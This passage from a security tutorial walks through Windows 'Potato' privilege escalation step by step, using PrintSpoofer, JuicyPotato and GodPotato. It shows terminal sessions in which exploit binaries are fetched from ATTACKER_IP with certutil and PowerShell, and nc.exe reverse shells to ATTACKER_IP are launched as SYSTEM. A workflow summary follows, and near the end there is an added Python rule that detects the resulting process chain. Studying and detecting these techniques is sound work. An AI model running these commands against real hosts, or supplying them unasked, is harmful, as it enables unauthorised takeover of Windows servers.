- Creates a named pipe server with a specific name pattern.
- Triggers the Print Spooler service to connect to the pipe.
- Impersonates the SYSTEM token from the pipe connection.
Supported versions: Windows 10, Server 2016/2019.
Interactive SYSTEM shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> PrintSpoofer.exe -i -c cmd │
│ [+] Found privilege: SeImpersonatePrivilege │
│ [+] Named pipe listening... │
│ [+] CreateProcessAsUser() OK │
│ │
│ C:\Windows\system32> whoami │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Reverse shell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Temp> PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe │
│ ATTACKER_IP 4444 -e cmd.exe" │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Download: itm4n/PrintSpoofer/releases
PrintSpoofer is often the simplest and fastest option — no CLSIDs, no port forwarding, no external dependencies. When in doubt on Server 2019, try PrintSpoofer first.
Practical Demonstration
The following walkthrough simulates a realistic privilege escalation engagement — from an initial low-privilege shell to full SYSTEM access. Two scenarios are covered: one targeting an older Windows version with JuicyPotato, and another targeting a modern version with GodPotato.
Step 1 — Initial Access
Assume you have obtained a low-privilege shell on a Windows target — this could be through a webshell on IIS, a SQL Server xp_cmdshell, or any service account compromise.
The first thing to do is identify who you are:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> whoami │
│ iis apppool\defaultapppool │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
You are running as a service account. This is the starting point for Potato attacks.
Step 2 — Enumerate Privileges
Check if the account holds impersonation privileges:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> whoami /priv │
│ │
│ PRIVILEGES INFORMATION │
│ ---------------------- │
│ │
│ Privilege Name Description State │
│ ============================= ================================ ========= │
│ SeAssignPrimaryTokenPrivilege Replace a process level token Disabled │
│ SeIncreaseQuotaPrivilege Adjust memory quotas for process Disabled │
│ SeShutdownPrivilege Shut down the system Disabled │
│ SeAuditPrivilege Generate security audits Disabled │
│ SeChangeNotifyPrivilege Bypass traverse checking Enabled │
│ SeUndockPrivilege Remove computer from dock Disabled │
│ SeImpersonatePrivilege Impersonate a client Enabled │
│ SeCreateGlobalPrivilege Create global objects Enabled │
│ SeIncreaseWorkingSetPrivilege Increase a process working set Disabled │
│ SeTimeZonePrivilege Change the time zone Disabled │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
SeImpersonatePrivilege is Enabled — Potato attacks are viable.
A quick filter to confirm:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> whoami /priv | findstr /i "impersonate assign" │
│ SeAssignPrimaryTokenPrivilege Replace a process level token Disabled │
│ SeImpersonatePrivilege Impersonate a client Enabled │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Step 3 — Enumerate the Operating System
Determine the Windows version to choose the correct variant:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" │
│ │
│ OS Name: Microsoft Windows Server 2016 Standard │
│ OS Version: 10.0.14393 N/A Build 14393 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Check the architecture to download the correct binary:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> wmic os get osarchitecture │
│ OSArchitecture │
│ 64-bit │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Decision: Windows Server 2016 (pre-2019 patch) + 64-bit + SeImpersonatePrivilege → JuicyPotato.
Step 4 — Transfer the Exploit
From the attacker machine, host the binary and transfer it to the target. Multiple methods work:
Attacker — start a Python HTTP server:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ cp /usr/share/windows-resources/juicy-potato/ │
│ JuicyPotato.exe . │
│ [attacker@kali ~]$ python3 -m http.server 8080 │
│ Serving HTTP on 0.0.0.0 port 8080 ... │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim — download the binary:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> certutil -urlcache -split -f │
│ http://ATTACKER_IP:8080/JuicyPotato.exe C:\Windows\Temp\jp.exe │
│ **** Online **** │
│ 0000 ... │
│ CertUtil: -URLCache command completed successfully. │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Alternative using PowerShell:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Windows PowerShell _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ PS C:\inetpub\wwwroot> Invoke-WebRequest │
│ -Uri http://ATTACKER_IP:8080/JuicyPotato.exe │
│ -OutFile C:\Windows\Temp\jp.exe │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Also transfer nc.exe (netcat) for the reverse shell callback:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> certutil -urlcache -split -f │
│ http://ATTACKER_IP:8080/nc.exe C:\Windows\Temp\nc.exe │
│ **** Online **** │
│ CertUtil: -URLCache command completed successfully. │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Step 5 — Scenario A: JuicyPotato on Server 2016
Attacker — start the listener:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim — execute JuicyPotato:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Windows\Temp> jp.exe -l 1337 -p C:\Windows\Temp\nc.exe │
│ -a "-e cmd.exe ATTACKER_IP 4444" -t * │
│ -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} │
│ Testing {8BC3F05E-D86B-11D0-A075-00C04FB68820} 1337 │
│ .... │
│ [+] authresult 0 │
│ {8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\SYSTEM │
│ [+] CreateProcessWithTokenW OK │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
If the CLSID does not work, try another one from the CLSID list for the target OS version.
Attacker — SYSTEM shell received:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 49832 │
│ Microsoft Windows [Version 10.0.14393] │
│ (c) 2016 Microsoft Corporation. All rights reserved. │
│ │
│ C:\Windows\system32> whoami │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Step 5 — Scenario B: GodPotato on Server 2022
On modern Windows (Server 2019+), JuicyPotato no longer works. GodPotato is the go-to alternative.
Verify .NET Framework version (to choose the correct GodPotato binary):
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> reg query "HKLM\SOFTWARE\Microsoft\NET Framework │
│ Setup\NDP" /s | findstr /i "version" │
│ │
│ Version REG_SZ 2.0.50727.4927 │
│ Version REG_SZ 3.5.30729.4926 │
│ Version REG_SZ 4.8.04084 │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
.NET 4.x available → use GodPotato-NET4.exe.
Transfer GodPotato (same method as Step 4):
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\inetpub\wwwroot> certutil -urlcache -split -f │
│ http://ATTACKER_IP:8080/GodPotato-NET4.exe C:\Windows\Temp\gp.exe │
│ **** Online **** │
│ CertUtil: -URLCache command completed successfully. │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Attacker — start the listener:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Victim — execute GodPotato:
┌─────────────────────────────────────────────────────────────────────────────┐
│ C:\Windows\system32\cmd.exe _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ C:\Windows\Temp> gp.exe -cmd "C:\Windows\Temp\nc.exe │
│ -e cmd.exe ATTACKER_IP 4444" │
│ [*] CombaseModule: 0x140000000 │
│ [*] DispatchTable: 0x140000000 │
│ [*] UseProtseqFunction: 0x140000000 │
│ [*] ImpersonateClient: OK │
│ [*] Token: OK │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Attacker — SYSTEM shell received:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Terminal — attacker@kali _ □ x │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ [attacker@kali ~]$ nc -lvnp 4444 │
│ listening on [any] 4444 ... │
│ connect to [ATTACKER_IP] from (UNKNOWN) [TARGET_IP] 51204 │
│ Microsoft Windows [Version 10.0.20348] │
│ (c) Microsoft Corporation. All rights reserved. │
│ │
│ C:\Windows\system32> whoami │
│ nt authority\system │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
Summary — Practical Workflow
┌─────────────────────────────────────────────────────────────────────────────┐
│ POTATO PRIVESC — PRACTICAL WORKFLOW │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. whoami → Identify current user │
│ 2. whoami /priv → Check SeImpersonatePrivilege │
│ 3. systeminfo | findstr /B "OS" → Identify Windows version │
│ 4. wmic os get osarchitecture → Confirm x86 or x64 │
│ 5. Choose variant: │
│ ├─ Server <= 2016 → JuicyPotato │
│ ├─ Server 2019 (outbound ok) → RoguePotato │
│ ├─ Server 2019+ / 2022+ → GodPotato / SigmaPotato │
│ └─ Need fileless execution? → SigmaPotato │
│ 6. Transfer binary → certutil / PowerShell / SMB │
│ 7. Start listener → nc -lvnp PORT │
│ 8. Execute exploit → Receive SYSTEM shell │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
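The process tree the workflow above leaves behind (w3wp.exe running as an IIS app pool spawns the Potato binary, which in turn spawns nc.exe as SYSTEM) is the most reliable host-side signal for the whole family, because every variant ends with CreateProcessWithTokenW or CreateProcessAsUser being called from a service-account process. The following is an added detection example, not code from the original post or from any Potato project: it runs over constructed Sysmon Event ID 1 records (the `User` and `ParentUser` fields, the latter available from Sysmon 13 onward) and flags a SYSTEM child whose direct parent runs as a service account.

```python
# Added example (not from the original post): flag a SYSTEM child process whose
# direct parent runs as a service account, the shape a Potato-style token
# impersonation leaves in Sysmon Event ID 1 (process creation) telemetry.
from dataclasses import dataclass

# Parent identities that should never be the direct origin of a SYSTEM process.
SERVICE_PREFIXES = ("IIS APPPOOL\\", "NT SERVICE\\")
SERVICE_ACCOUNTS = {"NT AUTHORITY\\NETWORK SERVICE", "NT AUTHORITY\\LOCAL SERVICE"}
SYSTEM = "NT AUTHORITY\\SYSTEM"


@dataclass
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields (ParentUser requires Sysmon 13+)."""
    image: str
    user: str
    parent_image: str
    parent_user: str


def is_service_account(user: str) -> bool:
    u = user.upper()
    return u in SERVICE_ACCOUNTS or u.startswith(SERVICE_PREFIXES)


def is_potato_shape(ev: ProcEvent) -> bool:
    """True when a service-account parent directly spawned a SYSTEM child."""
    return ev.user.upper() == SYSTEM and is_service_account(ev.parent_user)


def find_alerts(events):
    return [ev for ev in events if is_potato_shape(ev)]


# Constructed sample records mirroring the walkthrough's process chain.
SAMPLE = [
    ProcEvent("C:\\Windows\\Temp\\jp.exe", "IIS APPPOOL\\DefaultAppPool",
              "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "IIS APPPOOL\\DefaultAppPool"),
    ProcEvent("C:\\Windows\\Temp\\nc.exe", "NT AUTHORITY\\SYSTEM",
              "C:\\Windows\\Temp\\jp.exe", "IIS APPPOOL\\DefaultAppPool"),  # alert
    ProcEvent("C:\\Windows\\System32\\svchost.exe", "NT AUTHORITY\\SYSTEM",
              "C:\\Windows\\System32\\services.exe", "NT AUTHORITY\\SYSTEM"),  # benign
    ProcEvent("C:\\Windows\\System32\\conhost.exe", "NT AUTHORITY\\NETWORK SERVICE",
              "C:\\Windows\\System32\\svchost.exe", "NT AUTHORITY\\NETWORK SERVICE"),  # benign
]

if __name__ == "__main__":
    for ev in find_alerts(SAMPLE):
        print(f"ALERT: {ev.parent_image} ({ev.parent_user}) spawned {ev.image} as {ev.user}")
```

The rule is deliberately independent of the tool's file name or CLSID, so renaming jp.exe or swapping in GodPotato or SigmaPotato does not evade it; tuning is needed only for legitimate service-hosted launchers on a given host.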
Cheat Sheet
For a quick-reference command cheat sheet covering all Potato variants, CLSIDs, and one-liners for real-world engagements, check out:
Potato Privilege Escalation — Cheat Sheet
Conclusion
The Potato family represents one of the most persistent and evolving attack classes in Windows privilege escalation. Spanning a decade, these techniques exploit a fundamental design decision in Windows: granting service accounts the ability to impersonate authenticated clients.
Each variant reflects a specific moment in the arms race between researchers and Microsoft — from NBNS spoofing in 2016 to cross-session DCOM abuse in 2024. Understanding the entire family provides not just a toolkit for privilege escalation, but a deep understanding of Windows authentication internals, DCOM architecture, and the boundaries of Microsoft’s security model.
The key takeaway: if you compromise a service account with SeImpersonatePrivilege, there is almost certainly a Potato variant that will work — regardless of the Windows version or patch level.
References
[1] Microsoft, “Impersonation Levels (Authorization),” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/com/impersonation-levels
[2] Microsoft, “Privilege Constants (Authorization),” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
[3] Microsoft, “DCOM Technical Overview,” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/com/dcom-technical-overview
[4] Microsoft, “Named Pipes,” Microsoft Learn, 2024. Available: https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes
[5] S. Breen, “Hot Potato — Windows Privilege Escalation,” FoxGlove Security, Jan. 2016. Available: https://foxglovesecurity.com/2016/01/16/hot-potato/
[6] S. Breen and C. Mallz, “Rotten Potato — Privilege Escalation from Service Accounts to SYSTEM,” 2016. Available: https://github.com/breenmachine/RottenPotatoNG
[7] A. Pierini and G. Trotta, “Juicy Potato — Abuse SeImpersonate Privilege,” 2018. Available: https://github.com/ohpe/juicy-potato
[8] A. Pierini and A. Cocomazzi, “No more JuicyPotato? Old story, welcome RoguePotato!” Decoder’s Blog, May 2020. Available: https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
[9] C. Coburn, “Sweet Potato,” GitHub, 2020. Available: https://github.com/CCob/SweetPotato
[10] BeichenDream, “GodPotato,” GitHub, 2022. Available: https://github.com/BeichenDream/GodPotato
[11] Prepouce and Hack0ura, “CoercedPotato,” GitHub, 2023. Available: https://github.com/Prepouce/CoercedPotato
[12] A. Pierini, “Hello: I’m your Domain Admin and I want to authenticate against you,” Decoder’s Blog, Apr. 2024. Available: https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/
[14] J. Lajara, “Potatoes — Windows Privilege Escalation,” Nov. 2020. Available: https://jlajara.gitlab.io/Potatoes_Windows_Privesc
[15] HideAndSec, “In the Potato Family, I Want Them All,” 2023. Available: https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all
[16] Itm4n, “PrintSpoofer — Abusing Impersonation Privileges on Windows 10 and Server 2019,” May 2020. Available: https://github.com/itm4n/PrintSpoofer
[17] T. McCann, “SigmaPotato — GodPotato Fork with .NET Reflection, Built-in Reverse Shell, and AV Bypass,” GitHub, 2023. Available: https://github.com/tylerdotrar/SigmaPotato
[18] A. Cocomazzi and A. Pierini, “JuicyPotatoNG,” GitHub, 2022. Available: https://github.com/antonioCoco/JuicyPotatoNG
[19] M. Van Deusen, “GenericPotato,” GitHub, 2021. Available: https://github.com/micahvandeusen/GenericPotato